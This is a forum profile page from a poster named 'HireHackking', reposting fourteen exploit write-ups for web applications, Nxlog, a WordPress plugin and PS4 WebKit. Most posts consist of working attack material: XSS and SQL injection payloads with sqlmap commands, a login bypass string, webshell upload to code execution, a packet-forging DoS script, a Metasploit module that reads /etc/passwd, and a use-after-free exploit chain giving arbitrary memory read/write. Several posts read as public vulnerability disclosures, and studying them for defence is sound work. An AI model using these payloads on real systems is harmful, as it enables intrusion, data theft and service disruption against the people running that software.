Jump to content

HireHackking

Members

  • Joined

  • Last visited

View Profile Find content

Everything posted by HireHackking

  1. HireHackking

    Interview Management System 1.0 - Stored XSS in Add New Question

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Interview Management System 1.0 - Stored XSS in Add New Question # Exploit Author: Saeed Bala Ahmed (r0b0tG4nG) # Date: 2020-12-09 # Google Dork: N/A # Vendor Homepage: https://www.sourcecodester.com/php/14585/interview-management-system-phpmysqli-full-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14585&title=Interview+Management+System+in+PHP%2FMySQLi+with+Full+Source+Codee # Affected Version: Version 1 # Patched Version: Unpatched # Category: Web Application # Tested on: Parrot OS Step 1: Log in to the application with any valid user credentials. Step 2: Click on Add New Question Page. Step 3: input "<script>alert(document.cookie)</script>" in the new question field and select add new question. Step 4: Once you have an XSS payload as a question in add new question page, click on View Questions Page. Step 5: This will trigger the XSS payload.
  2. HireHackking

    Online Tours & Travels Management System 1.0 - "id" SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Online Tours & Travels Management System 1.0 - "id" SQL Injection # Exploit Author: Saeed Bala Ahmed (r0b0tG4nG) # Date: 2020-12-11 # Google Dork: N/A # Vendor Homepage: https://www.sourcecodester.com/php/14510/online-tours-travels-management-system-project-using-php-and-mysql.html # Software Link: https://www.sourcecodester.com/download-code?nid=14510&title=Online+Tours+%26+Travels+management+system+project+using+PHP+and+MySQL # Affected Version: Version 1 # Patched Version: Unpatched # Category: Web Application # Tested on: Parrot OS Step 1. Login to the application with admin credentials Step 2. Click on "Bookings" in header and select "Add Bookings". Step 3. Complete the required details and click on "Save" to save the new Bookings. Step 4. On the "Bookings" page, find your new booking/existing booking and click on the edit icon. Step 5. You will be redirected to a page like "http://localhost/admin/update_booking.php?id=1". Or visit any page that has the "id" parameter. Capture the current page request in burpsuite. Step 6. Save request and run sqlmap on request file using command " sqlmap -r request -p id --time-sec=5 --dbs ". Step 7. This will inject successfully and you will have an information disclosure of all databases contents. --- Parameter: id (GET) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: id=2' RLIKE (SELECT (CASE WHEN (4085=4085) THEN 2 ELSE 0x28 END))-- rKrg Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: id=2' AND (SELECT 7113 FROM(SELECT COUNT(*),CONCAT(0x716a626a71,(SELECT (ELT(7113=7113,1))),0x71766b6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- tGzP Type: stacked queries Title: MySQL >= 5.0.12 stacked queries (comment) Payload: id=2';SELECT SLEEP(5)# Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=2' AND (SELECT 8504 FROM (SELECT(SLEEP(5)))sMoK)-- IXQq Type: UNION query Title: MySQL UNION query (NULL) - 4 columns Payload: id=-1072' UNION ALL SELECT NULL,CONCAT(0x716a626a71,0x664b4d6f72794f69657a6c5a4e415a434b70547951435077694b66505a7572574d73704b54524b72,0x71766b6a71),NULL,NULL# ---
  3. HireHackking

    Interview Management System 1.0 - 'id' SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Interview Management System 1.0 - 'id' SQL Injection # Exploit Author: Saeed Bala Ahmed (r0b0tG4nG) # Date: 2020-12-10 # Google Dork: N/A # Vendor Homepage: https://www.sourcecodester.com/php/14585/interview-management-system-phpmysqli-full-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14585&title=Interview+Management+System+in+PHP%2FMySQLi+with+Full+Source+Code # Affected Version: Version 1 # Patched Version: Unpatched # Category: Web Application # Tested on: Parrot OS Step 1. Login to the application with any verified user credentials Step 2. Click on View Candidates page and select take exam. If there is no candidate, click on "Add New Candidate" page, fill details and add new candidate. Step 3. Click on "Take Exam" and capture the request in burpsuite. Step 4. Save request and run sqlmap on request file using command " sqlmap -r request -p id --time-sec=5 --dbs ". Step 5. This will inject successfully and you will have an information disclosure of all databases contents. --- Parameter: id (GET) Type: boolean-based blind Title: Boolean-based blind - Parameter replace (original value) Payload: id=(SELECT (CASE WHEN (7913=7913) THEN 1 ELSE (SELECT 5980 UNION SELECT 3372) END)) Type: stacked queries Title: MySQL >= 5.0.12 stacked queries (comment) Payload: id=1;SELECT SLEEP(5)# Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=1 AND (SELECT 6708 FROM (SELECT(SLEEP(5)))QTiW) ---
  4. HireHackking

    Nxlog Community Edition 2.10.2150 - DoS (Poc)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Nxlog Community Edition 2.10.2150 - DoS (Poc) # Date: 15/12/2020 # Exploit Author: Guillaume PETIT # Vendor Homepage: https://nxlog.co # Software Link: https://nxlog.co/products/nxlog-community-edition/download # Version: 2.10.2150 # Tested on: Linux Debian 10 && Windows Server 2019 # CVE: CVE-2020-35488 #!/usr/bin/python3 import sys import time import argparse from scapy.all import * def getPayload(args): # IF UNIX if (args.OS == 1): return "Sep 14 14:09:09 .. dhcp service[warning] 110 Silence is golden" # IF WINDOWS elif (args.OS == 2): return "Sep 14 14:09:09 CON dhcp service[warning] 110 Silence is golden" # Test elif (args.OS == 3): return "Sep 14 14:09:09 123soleil dhcp service[warning] 110 Silence is golden" def runExploit(args,payload): priority = 30 message = payload syslog = IP(src="192.168.1.10",dst=args.IP)/UDP(sport=666,dport=args.PORT)/Raw(load="<" + str(priority) + ">" + message) send(syslog,verbose=args.DEBUG) def getArguments(): parser = argparse.ArgumentParser(description="Go h@ck SYSLOG") parser.add_argument("-ip", "-IP", dest="IP", type=str, metavar="IP destination", required=True,default=1, help="IP of NXLOG server") parser.add_argument("-p", "-P", dest="PORT", type=int, metavar="Port destination", required=False,default=514, help="Port of NXLOG default 514") parser.add_argument("-os", "-OS", dest="OS", type=int, metavar="OS", default=1, required=True, help="1 : For unix payload \n 2 : For Windows Paylaod \n 3 : Just for test") parser.add_argument("-d", "-D", dest="DEBUG", type=int, metavar="DEBUG", default=0, required=False, help="1 : Debbug enable") return parser.parse_args() def main(): args = getArguments() payload = getPayload(args) runExploit(args,payload) main()
  5. HireHackking

    Victor CMS 1.0 - Multiple SQL Injection (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Victor CMS 1.0 - Multiple SQL Injection (Authenticated) # Date: 17.12.2020 # Exploit Author: Furkan Göksel # Vendor Homepage: https://github.com/VictorAlagwu/CMSsite # Software Link: https://github.com/VictorAlagwu/CMSsite/archive/master.zip # Version: 1.0 # Description: The Victor CMS v1.0 application is vulnerable to SQL # injection in c_id parameter of admin_edit_comment.php, p_id parameter # of admin_edit_post.php, u_id parameter of admin_edit_user.php, edit # parameter of admin_update_categories.php. # Tested on: Apache2/Linux Step 1: Register the system through main page and login your account Step 2: After successful login, select one of the specified tabs (post, categories, comments, users) Step 3: When you click edit button of these records, an HTTP request is sent to server to get details of this record with corresponding parameters (eg. for edit comment it is c_id parameter) Step 4: Inject your SQL payload to these ids or use sqlmap to dump Example PoC request is as follows: GET /cve/admin/comment.php?source=edit_comment&c_id=2%20AND%20SLEEP(10) HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Cookie: PHPSESSID=st8hhobgplut500p3lpug8qa66 Upgrade-Insecure-Requests: 1 Same PoC payload is valid for all edit features of specified tabs.
  6. HireHackking

    PHPJabbers Appointment Scheduler 2.3 - Reflected XSS (Cross-Site Scripting)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: PHPJabbers Appointment Scheduler 2.3 - Reflected XSS (Cross-Site Scripting) # Date: 2020-12-14 # Exploit Author: Andrea Intilangelo # Vendor Homepage: https://www.phpjabbers.com # Software Link: https://www.phpjabbers.com/appointment-scheduler # Version: 2.3 # Tested on: Latest Version of Desktop Web Browsers (ATTOW: Firefox 83.0, Microsoft Edge 87.0.664.60) # CVE: CVE-2020-35416 Reflected Cross-Site Scripting (XSS) vulnerability in 'index.php' login-portal webpage of Stivasoft/PHPJabbers Appointment Scheduler v2.3 (and many others, in example from "ilmiogestionale.eu", since some companies/web agencies did a script rebrand/rework) allows remote attacker to inject arbitrary script or HTML. Request parameters affected: "date", "action", arbitrarily supplied URL parameters, possible others. PoC Request: GET /index.php?controller=pjFrontPublic&action=pjActionServices&cid=1&layout=1&date=%3cscript%3ealert(1)%3c%2fscript%3e&theme=theme9 HTTP/1.1 Host: [removed] Connection: close Accept: */* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 X-Requested-With: XMLHttpRequest Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://[removed] Accept-Encoding: gzip, deflate Accept-Language: it-IT,it;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: _ga=GA1.2.505990147.1607596638; _gid=GA1.2.1747301294.1607596638; AppointmentScheduler=5630ae3ab2ed56dbe79c033b84565422 PoC Response: HTTP/1.1 200 OK Server: nginx Date: Thu, 14 Dec 2020 10:48:41 GMT Content-Type: text/html; charset=utf-8 Connection: close Vary: Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: true Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Origin, X-Requested-With Content-Length: 13988 <div class="container-fluid"> <div class="row"> <div class="col-lg-4 col-md-4 col-sm-4 col-xs-12"> <div class="panel panel-default pjAsContainer pjAsAside"> <div class="panel-heading p ...[SNIP]... <div class="pj-calendar-ym">Dicembre, <script>alert(1)</script></div> ...[SNIP]...
  7. HireHackking

    Employee Record System 1.0 - Multiple Stored XSS

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Employee Record System 1.0 - Multiple Stored XSS # Exploit Author: Saeed Bala Ahmed (r0b0tG4nG) # Date: 2020-12-09 # Google Dork: N/A # Vendor Homepage: https://www.sourcecodester.com/php/14588/employee-record-system-phpmysqli-full-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14588&title=Employee+Record+System+in+PHP%2FMySQLi+with+Full+Source+Code # Affected Version: Version 1 # Patched Version: Unpatched # Category: Web Application # Tested on: Parrot OS Step 1: Log in to the application with any valid user credentials. Step 2: Click on Add Employee. Step 3: input "<script>alert(1)</script>" in all fields except phone number fields. Note: increase the values of "1" in "alert(1)" to determine which field is vulnerable. Eg <script>alert(2)</script>, <script>alert(3)</script> ....etc. Step 4: Once all fields are completed, Click on ADD RECORD to save the record. Step 5: Click on All Employees page and this will trigger the Stored XSS. Step 6: To view all Stored XSS, after clicking on All Employees page, click on the View Employee Icon. This will tigger all Stored XSS payloads.
  8. HireHackking

    Alumni Management System 1.0 - Unrestricted File Upload To RCE

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Alumni Management System 1.0 - Unrestricted File Upload To RCE # Exploit Author: Aakash Madaan # Date: 2020-12-17 # Vendor Homepage: https://www.sourcecodester.com/php/14524/alumni-management-system-using-phpmysql-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14524&title=Alumni+Management+System+using+PHP%2FMySQL+with+Source+Code # Affected Version: Version 1 # Tested on: Parrot OS Step 1. Login to the application with admin credentials Step 2. Click on "System Settings" page. Step 3. At the image upload field, browse and select any php webshell. Click on upload to upload the php webshell. Step 4. Visit "http://localhost/admin/assets/uploads/" and select your upload phpwebshell. Step 5. You should have a remote code execution.
  9. HireHackking

    Point of Sale System 1.0 - Authentication Bypass

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Point of Sale System 1.0 - Authentication Bypass # Exploit Author: Saeed Bala Ahmed (r0b0tG4nG) # Date: 2020-12-17 # Google Dork: N/A # Vendor Homepage: https://www.sourcecodester.com/php/9620/point-sale-system-pos.html # Software Link: https://www.sourcecodester.com/download-code?nid=9620&title=Point+of+Sale+System+%28POS%29+using+PHP+with+Source+Code # Affected Version: Version 1 # Patched Version: Unpatched # Category: Web Application # Tested on: Parrot OS # Description: Easy authentication bypass vulnerability on the application allows an attacker to log in as Administrator. Step 1: On the login page, simply use { ' or 0=0 # } as username Step 2: On the login page, use same query{ ' or 0=0 # } as password All set you should be logged in as Administrator.
  10. HireHackking

    Wordpress Plugin Duplicator 1.3.26 - Unauthenticated Arbitrary File Read (Metasploit)

    HireHackking posted a blog entry in Hacker Technology
    ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Auxiliary::Scanner def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress Duplicator File Read Vulnerability', 'Description' => %q{ This module exploits an unauthenticated directory traversal vulnerability in WordPress plugin 'Duplicator' plugin version 1.3.24-1.3.26, allowing arbitrary file read with the web server privileges. This vulnerability was being actively exploited when it was discovered.}, 'References' => [ ['CVE', '2020-11738'], ['WPVDB', '10078'], ['URL', 'https://snapcreek.com/duplicator/docs/changelog'] ], 'Author' => [ 'Ramuel Gall', # Vulnerability discovery 'Hoa Nguyen - SunCSR Team' # Metasploit module ], 'DisclosureDate' => 'Feb 19 2020', 'License' => MSF_LICENSE )) register_options( [ OptString.new('FILEPATH', [true, 'The path to the file to read', '/etc/passwd']), OptInt.new('DEPTH', [true, 'Traversal Depth (to reach the root folder)', 5]) ]) end def check check_plugin_version_from_readme('duplicator_download','1.3.27', '1.3.24') end def run_host(ip) traversal = '../' * datastore['DEPTH'] filename = datastore['FILEPATH'] filename = filename[1, filename.length] if filename =~ /^\// res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path,'wp-admin', 'admin-ajax.php'), 'vars_get' => { 'action' => 'duplicator_download', 'file' => "#{traversal}#{filename}" } }) fail_with Failure::Unreachable, 'Connection failed' unless res fail_with Failure::NotVulnerable, 'Connection failed. Nothingn was downloaded' if res.code != 200 fail_with Failure::NotVulnerable, 'Nothing was downloaded. Change the DEPTH parameter' if res.body.length.zero? print_status('Downloading file...') print_line("\n#{res.body}\n") fname = datastore['FILEPATH'] path = store_loot( 'duplicator.traversal', 'text/plain', ip, res.body, fname ) print_good("File saved in: #{path}") end end
  11. HireHackking

    Alumni Management System 1.0 - 'id' SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Alumni Management System 1.0 - 'id' SQL Injection # Exploit Author: Aakash Madaan # Date: 2020-12-17 # Vendor Homepage: https://www.sourcecodester.com/php/14524/alumni-management-system-using-phpmysql-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14524&title=Alumni+Management+System+using+PHP%2FMySQL+with+Source+Code # Affected Version: Version 1 # Tested on: Parrot OS Step 1. Login to the application with admin credentials Step 2. Click on "Events" page. Step 3. Choose any event and select "view" or "edit". The url should be " http://localhost/index.php?page=view_event&id=2" or " http://localhost/admin/index.php?page=manage_event&id=1" Step 4. Capture the request to the "view" or "edit" event page in burpsuite. Step 5. Save the captured request and run sqlmap on it using "sqlmap -r request --time-sec=5 --dbs --- Parameter: id (GET) Type: boolean-based blind Title: Boolean-based blind - Parameter replace (original value) Payload: page=edit_student&id=(SELECT (CASE WHEN (6191=6191) THEN 3 ELSE (SELECT 5620 UNION SELECT 3605) END)) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: page=edit_student&id=3 AND (SELECT 7847 FROM (SELECT(SLEEP(5)))LQiE) Type: UNION query Title: Generic UNION query (NULL) - 9 columns Payload: page=edit_student&id=-4840 UNION ALL SELECT NULL,CONCAT(0x717a7a7171,0x7152494c444964626e63466c66734573495771697a566862414e6c6f786e6d54566c6549484f6967,0x71767a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- - --- Step 6. Sqlmap should inject the web-app successfully which leads to information disclosure
  12. HireHackking

    Alumni Management System 1.0 - "Course Form" Stored XSS

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Alumni Management System 1.0 - "Course Form" Stored XSS # Exploit Author: Aakash Madaan # Date: 2020-12-10 # Vendor Homepage: https://www.sourcecodester.com/php/14524/alumni-management-system-using-phpmysql-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14524&title=Alumni+Management+System+using+PHP%2FMySQL+with+Source+Code # Affected Version: Version 1 # Tested on: Parrot OS Step 1. Login to the application with admin credentials Step 2. Click on the "Course List" page. Step 3. In the "Course Form" field, use XSS payload "<script>alert("course")</script>" as the name of new course and click on save. Step 4. This should trigger the XSS payload and anytime you click on the "Course List" page, your stored XSS payload will be triggered.
  13. HireHackking

    Sony Playstation 4 (PS4) < 6.72 - 'ValidationMessage::buildBubbleTree()' Use-After-Free WebKit Code Execution (PoC)

    HireHackking posted a blog entry in Hacker Technology
    const OFFSET_ELEMENT_REFCOUNT = 0x10; const OFFSET_JSAB_VIEW_VECTOR = 0x10; const OFFSET_JSAB_VIEW_LENGTH = 0x18; const OFFSET_LENGTH_STRINGIMPL = 0x04; const OFFSET_HTMLELEMENT_REFCOUNT = 0x14; const LENGTH_ARRAYBUFFER = 0x8; const LENGTH_STRINGIMPL = 0x14; const LENGTH_JSVIEW = 0x20; const LENGTH_VALIDATION_MESSAGE = 0x30; const LENGTH_TIMER = 0x48; const LENGTH_HTMLTEXTAREA = 0xd8; const SPRAY_ELEM_SIZE = 0x6000; const SPRAY_STRINGIMPL = 0x1000; const NB_FRAMES = 0xfa0; const NB_REUSE = 0x8000; var g_arr_ab_1 = []; var g_arr_ab_2 = []; var g_arr_ab_3 = []; var g_frames = []; var g_relative_read = null; var g_relative_rw = null; var g_ab_slave = null; var g_ab_index = null; var g_timer_leak = null; var g_jsview_leak = null; var g_message_heading_leak = null; var g_message_body_leak = null; var g_obj_str = {}; var g_rows1 = '1px,'.repeat(LENGTH_VALIDATION_MESSAGE / 8 - 2) + "1px"; var g_rows2 = '2px,'.repeat(LENGTH_VALIDATION_MESSAGE / 8 - 2) + "2px"; var g_round = 1; var g_input = null; var guess_htmltextarea_addr = new Int64("0x2070a00d8"); /* Executed after deleteBubbleTree */ function setupRW() { /* Now the m_length of the JSArrayBufferView should be 0xffffff01 */ for (let i = 0; i < g_arr_ab_3.length; i++) { if (g_arr_ab_3[i].length > 0xff) { g_relative_rw = g_arr_ab_3[i]; debug_log("[+] Succesfully got a relative R/W"); break; } } if (g_relative_rw === null) die("[!] Failed to setup a relative R/W primitive"); debug_log("[+] Setting up arbitrary R/W"); /* Retrieving the ArrayBuffer address using the relative read */ let diff = g_jsview_leak.sub(g_timer_leak).low32() - LENGTH_STRINGIMPL + 1; let ab_addr = new Int64(str2array(g_relative_read, 8, diff + OFFSET_JSAB_VIEW_VECTOR)); /* Does the next JSObject is a JSView? Otherwise we target the previous JSObject */ let ab_index = g_jsview_leak.sub(ab_addr).low32(); if (g_relative_rw[ab_index + LENGTH_JSVIEW + OFFSET_JSAB_VIEW_LENGTH] === LENGTH_ARRAYBUFFER) g_ab_index = ab_index + LENGTH_JSVIEW; else g_ab_index = ab_index - LENGTH_JSVIEW; /* Overding the length of one JSArrayBufferView with a known value */ g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_LENGTH] = 0x41; /* Looking for the slave JSArrayBufferView */ for (let i = 0; i < g_arr_ab_3.length; i++) { if (g_arr_ab_3[i].length === 0x41) { g_ab_slave = g_arr_ab_3[i]; g_arr_ab_3 = null; break; } } if (g_ab_slave === null) die("[!] Didn't found the slave JSArrayBufferView"); /* Extending the JSArrayBufferView length */ g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_LENGTH] = 0xff; g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_LENGTH + 1] = 0xff; g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_LENGTH + 2] = 0xff; g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_LENGTH + 3] = 0xff; debug_log("[+] Testing arbitrary R/W"); let saved_vtable = read64(guess_htmltextarea_addr); write64(guess_htmltextarea_addr, new Int64("0x4141414141414141")); if (!read64(guess_htmltextarea_addr).equals("0x4141414141414141")) die("[!] Failed to setup arbitrary R/W primitive"); debug_log("[+] Succesfully got arbitrary R/W!"); /* Restore the overidden vtable pointer */ write64(guess_htmltextarea_addr, saved_vtable); /* Cleanup memory */ cleanup(); /* Getting code execution */ /* ... */ } function read(addr, length) { for (let i = 0; i < 8; i++) g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_VECTOR + i] = addr.byteAt(i); let arr = []; for (let i = 0; i < length; i++) arr.push(g_ab_slave[i]); return arr; } function read64(addr) { return new Int64(read(addr, 8)); } function write(addr, data) { for (let i = 0; i < 8; i++) g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_VECTOR + i] = addr.byteAt(i); for (let i = 0; i < data.length; i++) g_ab_slave[i] = data[i]; } function write64(addr, data) { write(addr, data.bytes()); } function cleanup() { select1.remove(); select1 = null; input1.remove(); input1 = null; input2.remove(); input2 = null; input3.remove(); input3 = null; div1.remove(); div1 = null; g_input = null; g_rows1 = null; g_rows2 = null; g_frames = null; } /* * Executed after buildBubbleTree * and before deleteBubbleTree */ function confuseTargetObjRound2() { if (findTargetObj() === false) die("[!] Failed to reuse target obj."); g_fake_validation_message[4] = g_jsview_leak.add(OFFSET_JSAB_VIEW_LENGTH + 5 - OFFSET_HTMLELEMENT_REFCOUNT).asDouble(); setTimeout(setupRW, 6000); } /* Executed after deleteBubbleTree */ function leakJSC() { debug_log("[+] Looking for the smashed StringImpl..."); var arr_str = Object.getOwnPropertyNames(g_obj_str); /* Looking for the smashed string */ for (let i = arr_str.length - 1; i > 0; i--) { if (arr_str[i].length > 0xff) { debug_log("[+] StringImpl corrupted successfully"); g_relative_read = arr_str[i]; g_obj_str = null; break; } } if (g_relative_read === null) die("[!] Failed to setup a relative read primitive"); debug_log("[+] Got a relative read"); let ab = new ArrayBuffer(LENGTH_ARRAYBUFFER); /* Spraying JSView */ let tmp = []; for (let i = 0; i < 0x10000; i++) { /* The last allocated are more likely to be allocated after our relative read */ if (i >= 0xfc00) g_arr_ab_3.push(new Uint8Array(ab)); else tmp.push(new Uint8Array(ab)); } tmp = null; /* * Force JSC ref on FastMalloc Heap * https://github.com/Cryptogenic/PS4-5.05-Kernel-Exploit/blob/master/expl.js#L151 */ var props = []; for (var i = 0; i < 0x400; i++) { props.push({ value: 0x42424242 }); props.push({ value: g_arr_ab_3[i] }); } /* * /!\ * This part must avoid as much as possible fastMalloc allocation * to avoid re-using the targeted object * /!\ */ /* Use relative read to find our JSC obj */ /* We want a JSView that is allocated after our relative read */ while (g_jsview_leak === null) { Object.defineProperties({}, props); for (let i = 0; i < 0x800000; i++) { var v = undefined; if (g_relative_read.charCodeAt(i) === 0x42 && g_relative_read.charCodeAt(i + 0x01) === 0x42 && g_relative_read.charCodeAt(i + 0x02) === 0x42 && g_relative_read.charCodeAt(i + 0x03) === 0x42) { if (g_relative_read.charCodeAt(i + 0x08) === 0x00 && g_relative_read.charCodeAt(i + 0x0f) === 0x00 && g_relative_read.charCodeAt(i + 0x10) === 0x00 && g_relative_read.charCodeAt(i + 0x17) === 0x00 && g_relative_read.charCodeAt(i + 0x18) === 0x0e && g_relative_read.charCodeAt(i + 0x1f) === 0x00 && g_relative_read.charCodeAt(i + 0x28) === 0x00 && g_relative_read.charCodeAt(i + 0x2f) === 0x00 && g_relative_read.charCodeAt(i + 0x30) === 0x00 && g_relative_read.charCodeAt(i + 0x37) === 0x00 && g_relative_read.charCodeAt(i + 0x38) === 0x0e && g_relative_read.charCodeAt(i + 0x3f) === 0x00) v = new Int64(str2array(g_relative_read, 8, i + 0x20)); else if (g_relative_read.charCodeAt(i + 0x10) === 0x42 && g_relative_read.charCodeAt(i + 0x11) === 0x42 && g_relative_read.charCodeAt(i + 0x12) === 0x42 && g_relative_read.charCodeAt(i + 0x13) === 0x42) v = new Int64(str2array(g_relative_read, 8, i + 8)); } if (v !== undefined && v.greater(g_timer_leak) && v.sub(g_timer_leak).hi32() === 0x0) { g_jsview_leak = v; props = null; break; } } } /* * /!\ * Critical part ended-up here * /!\ */ debug_log("[+] JSArrayBufferView: " + g_jsview_leak); /* Run the exploit again */ prepareUAF(); } /* * Executed after buildBubbleTree * and before deleteBubbleTree */ function confuseTargetObjRound1() { /* Force allocation of StringImpl obj. beyond Timer address */ sprayStringImpl(SPRAY_STRINGIMPL, SPRAY_STRINGIMPL * 2); /* Checking for leaked data */ if (findTargetObj() === false) die("[!] Failed to reuse target obj."); dumpTargetObj(); g_fake_validation_message[4] = g_timer_leak.add(LENGTH_TIMER * 8 + OFFSET_LENGTH_STRINGIMPL + 1 - OFFSET_ELEMENT_REFCOUNT).asDouble(); /* * The timeout must be > 5s because deleteBubbleTree is scheduled to run in * the next 5s */ setTimeout(leakJSC, 6000); } function handle2() { /* focus elsewhere */ input2.focus(); } function reuseTargetObj() { /* Delete ValidationMessage instance */ document.body.appendChild(g_input); /* * Free ValidationMessage neighboors. * SmallLine is freed -> SmallPage is cached */ for (let i = NB_FRAMES / 2 - 0x10; i < NB_FRAMES / 2 + 0x10; i++) g_frames[i].setAttribute("rows", ','); /* Get back target object */ for (let i = 0; i < NB_REUSE; i++) { let ab = new ArrayBuffer(LENGTH_VALIDATION_MESSAGE); let view = new Float64Array(ab); view[0] = guess_htmltextarea_addr.asDouble(); // m_element view[3] = guess_htmltextarea_addr.asDouble(); // m_bubble g_arr_ab_1.push(view); } if (g_round == 1) { /* * Spray a couple of StringImpl obj. prior to Timer allocation * This will force Timer allocation on same SmallPage as our Strings */ sprayStringImpl(0, SPRAY_STRINGIMPL); g_frames = []; g_round += 1; g_input = input3; setTimeout(confuseTargetObjRound1, 10); } else { setTimeout(confuseTargetObjRound2, 10); } } function dumpTargetObj() { debug_log("[+] m_timer: " + g_timer_leak); debug_log("[+] m_messageHeading: " + g_message_heading_leak); debug_log("[+] m_messageBody: " + g_message_body_leak); } function findTargetObj() { for (let i = 0; i < g_arr_ab_1.length; i++) { if (!Int64.fromDouble(g_arr_ab_1[i][2]).equals(Int64.Zero)) { debug_log("[+] Found fake ValidationMessage"); if (g_round === 2) { g_timer_leak = Int64.fromDouble(g_arr_ab_1[i][2]); g_message_heading_leak = Int64.fromDouble(g_arr_ab_1[i][4]); g_message_body_leak = Int64.fromDouble(g_arr_ab_1[i][5]); g_round++; } g_fake_validation_message = g_arr_ab_1[i]; g_arr_ab_1 = []; return true; } } return false; } function prepareUAF() { g_input.setCustomValidity("ps4"); for (let i = 0; i < NB_FRAMES; i++) { var element = document.createElement("frameset"); g_frames.push(element); } g_input.reportValidity(); var div = document.createElement("div"); document.body.appendChild(div); div.appendChild(g_input); /* First half spray */ for (let i = 0; i < NB_FRAMES / 2; i++) g_frames[i].setAttribute("rows", g_rows1); /* Instantiate target obj */ g_input.reportValidity(); /* ... and the second half */ for (let i = NB_FRAMES / 2; i < NB_FRAMES; i++) g_frames[i].setAttribute("rows", g_rows2); g_input.setAttribute("onfocus", "reuseTargetObj()"); g_input.autofocus = true; } /* HTMLElement spray */ function sprayHTMLTextArea() { debug_log("[+] Spraying HTMLTextareaElement ..."); let textarea_div_elem = document.createElement("div"); document.body.appendChild(textarea_div_elem); textarea_div_elem.id = "div1"; var element = document.createElement("textarea"); /* Add a style to avoid textarea display */ element.style.cssText = 'display:block-inline;height:1px;width:1px;visibility:hidden;'; /* * This spray is not perfect, "element.cloneNode" will trigger a fastMalloc * allocation of the node attributes and an IsoHeap allocation of the * Element. The virtual page layout will look something like that: * [IsoHeap] [fastMalloc] [IsoHeap] [fastMalloc] [IsoHeap] [...] */ for (let i = 0; i < SPRAY_ELEM_SIZE; i++) textarea_div_elem.appendChild(element.cloneNode()); } /* StringImpl Spray */ function sprayStringImpl(start, end) { for (let i = start; i < end; i++) { let s = new String("A".repeat(LENGTH_TIMER - LENGTH_STRINGIMPL - 5) + i.toString().padStart(5, "0")); g_obj_str[s] = 0x1337; } } function go() { /* Init spray */ sprayHTMLTextArea(); g_input = input1; /* Shape heap layout for obj. reuse */ prepareUAF(); }
  14. HireHackking

    Online Marriage Registration System 1.0 - 'searchdata' SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Online Marriage Registration System 1.0 - 'searchdata' SQL Injection # Date: 12-21-2020 # Exploit Authors: Andrea Bruschi, Raffaele Sabato # Vendor: Phpgurukul # Product Web Page: https://phpgurukul.com/online-marriage-registration-system-using-php-and-mysql/ # Version: 1.0 # CVE: CVE-2020-35151 I DESCRIPTION ======================================================================== A Time Based SQL Injection vulnerability was discovered in Online Marriage Registration System 1.0, in omrs/user/search.php and in omsr/admin/search.php. The request is authenticated but it is possible to register a new user account. Following the vulnerable code: $sdata=$_POST['searchdata']; ?> <h4 align="center">Result against "<?php echo $sdata;?>" keyword </h4> <table id="datatable1" class="table display responsive nowrap"> <thead> <tr> <th class="wd-15p">S.No</th> <th class="wd-15p">Reg Number</th> <th class="wd-20p">Husband Name</th> <th class="wd-10p">Date of Marriage</th> <th class="wd-10p">Status</th> <th class="wd-25p">Action</th> </tr> </thead> <tbody> <?php $uid=$_SESSION['omrsuid']; $sql="SELECT * from tblregistration where RegistrationNumber like '$sdata%' && UserID='$uid'"; $query = $dbh -> prepare($sql); 